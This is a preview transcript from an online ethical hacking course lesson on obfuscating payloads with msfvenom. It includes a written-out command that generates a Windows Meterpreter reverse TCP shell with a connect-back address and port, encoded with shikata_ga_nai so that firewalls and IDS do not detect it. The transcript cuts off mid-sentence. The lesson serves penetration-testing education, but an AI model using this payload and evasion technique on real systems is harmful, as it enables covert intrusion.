From the course: Ethical Hacking: Evading IDS, Firewalls, and Honeypots

Unlock the full course today

Join today to access over 22,600 courses taught by industry experts or purchase this course individually.

Obfuscating payloads with msfvenom

Obfuscating payloads with msfvenom

From the course: Ethical Hacking: Evading IDS, Firewalls, and Honeypots

Start my 1-month free trial

Obfuscating payloads with msfvenom

- [Instructor] When creating a payload, we need to make sure that it isn't detected as malicious by the target's firewall or IDS system. To demonstrate how to do this, we'll create an obfuscated payload using the msfvenom tools encoding capability. We can select one of a number of ways to obfuscate the payload. We do this by invoking an encoder and we can list out the possible encoders by msfvenom --list encoders. Okay, there's a few there, and we can see the shikata_ga_nai is reported to be an excellent encoder, so we'll use that one. Meterpreter can create many different types of payload for a range of targets. We'll create a Meterpreter reverse TCP payload for Windows X86, msfvenom -p windows/meterpreter/reverse_tcp - -platform windows -a x86 architecture. And we'll now set the IP address and port to connect back to LHOST = 10.0.2.15 and LPORT = 4444, and we'll select the shikata_ga_nai encoder with 100…

Contents